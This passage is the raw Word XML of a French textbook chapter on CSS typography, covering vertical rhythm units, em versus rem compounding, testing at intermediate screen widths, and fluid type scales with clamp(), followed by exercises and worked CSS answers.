            <w:tcW w:type="dxa" w:w="367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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="250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Valeur type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2838"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intra-composant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entre titre et texte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2504"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>0,5 unité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Inter-paragraphes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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Entre deux paragraphes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="250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1 unité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2838"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inter-sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entre deux blocs distincts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2504"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2 unités</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Marge de section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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Avant un titre de niveau 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="250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3 unités</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le rythme ne se voit pas consciemment, mais son absence se remarque : des espacements irréguliers font paraître la page brouillonne, même avec une belle typographie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.4 Unités imbriquées et pièges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les unités relatives dépendent de leur contexte. Une taille en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un élément dont la police est déjà en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se multiplie : c'est une source classique d'effet boule de neige.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`em` se compose, `rem` ne se compose pas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Effet boule de neige : chaque niveau réduit de 90 % */</w:t>
        <w:br/>
        <w:t>.liste { font-size: .9em; }</w:t>
        <w:br/>
        <w:t>.liste .liste { font-size: .9em; }   /* 81 % du parent */</w:t>
        <w:br/>
        <w:t>.liste .liste .liste { font-size: .9em; }  /* 73 % */</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Stable : rem partout */</w:t>
        <w:br/>
        <w:t>.liste { font-size: .9rem; }</w:t>
        <w:br/>
        <w:t>.liste .liste { font-size: .9rem; }  /* identique */</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UNITÉ RELATIVE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Unité dont la valeur dépend d'un contexte : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>em</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dépend de la police de l'élément, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> de la police racine, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> du parent, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> de la fenêtre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> restent utiles pour un composant autonome : un bouton dont le rembourrage est en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s'agrandit proportionnellement si l'on augmente sa taille de police. Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conviennent mieux aux espacements globaux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.5 Vérifier les états intermédiaires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tester à 320 et 1440 pixels ne suffit pas : les problèmes apparaissent souvent entre les deux, aux largeurs « moyennes » que personne ne teste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Visualiser les boîtes pendant les tests de largeur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Un utilitaire de test temporaire */</w:t>
        <w:br/>
        <w:t>* { outline: 1px solid rgb(255 0 0 / 25%); }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Dans l'inspecteur, redimensionner par pas de 40 px et observer :</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - les retours à la ligne</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - les éléments qui se chevauchent</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - les titres qui passent à trois lignes */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.71 — Six largeurs de test et ce qu'elles révèlent</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13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Largeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Ce qu'on teste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Point d'attention</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>320 px</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lisibilité minimale</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Débordement, taille de police</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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480 px</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Téléphone paysage</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Boutons trop larges</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>768 px</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tablette portrait</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Grilles à deux colonnes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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1024 px</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Ordinateur portable</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Mesure de lecture</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1440 px</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Grand écran</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Contenu trop étiré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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1920 px</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Écran large</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Marges excessives</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LA RÈGLE DES QUATRE LARGEURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Testez toujours 320, 768, 1024 et la largeur de votre écran. Quatre captures suffisent à repérer 90 % des problèmes de composition.</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clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplace la plupart des media queries de typographie.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La formule idéale s'écrit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>base + pente × vw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour la base.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échelle fluide se définit une fois dans les jetons.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rythme vertical se construit sur un multiple de l'interligne.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em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se compose, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non : choisir selon le besoin.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Tester les largeurs intermédiaires, pas seulement les extrêmes.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Ne jamais utiliser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul pour une taille de texte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La composition est fluide et régulière. Le chapitre suivant traite l'accessibilité de façon systématique, au-delà des bonnes intentions.</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22.1 — Construire une échelle fluide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Créez cinq tailles de titre fluides entre 360 et 1280 pixels.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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</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Définissez des variables réutilisables.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la croissance à 360, 600, 900 et 1280.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 22.2 — Établir un rythme vertical</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 article enchaîne titre, sous-titre, paragraphes, citation et liste.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Définissez une unité de rythme.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Appliquez des marges en multiples de cette unité.</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la régularité à deux tailles d'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 22.3 — Diagnostiquer un effet boule de neige</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Les listes imbriquées deviennent illisibles au troisième niveau.</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Identifiez la cause.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 xml:space="preserve">Proposez une correction en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rem</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 xml:space="preserve">Indiquez dans quel cas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reste préférable.</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22.1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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --t1: clamp(1.25rem, 1.16rem + .38vw, 1.5rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --t2: clamp(1.5rem, 1.32rem + .78vw, 2rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --t3: clamp(1.85rem, 1.55rem + 1.3vw, 2.75rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --t4: clamp(2.3rem, 1.8rem + 2.2vw, 3.75rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --t5: clamp(2.9rem, 2.1rem + 3.5vw, 5rem);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque niveau croît d'environ 20 % à chaque cran à 360 px, et les écarts s'ouvrent sur grand écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les bornes maximales évitent qu'un titre de niveau 1 occupe trois lignes sur un écran de 1440 pixels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 22.2</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article {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --unite: 1.6rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.6;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>article h2 { margin-block: calc(var(--unite) * 2) var(--unite); }</w:t>
        <w:br/>
        <w:t>article p { margin-block: 0 var(--unite); }</w:t>
        <w:br/>
        <w:t>article blockquote {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-block: calc(var(--unite) * 1.5);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-inline-start: var(--unite);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-inline-start: 3px solid #e0a21b;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une unité unique et des multiples simples produisent une page régulière sans effort de calcul.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
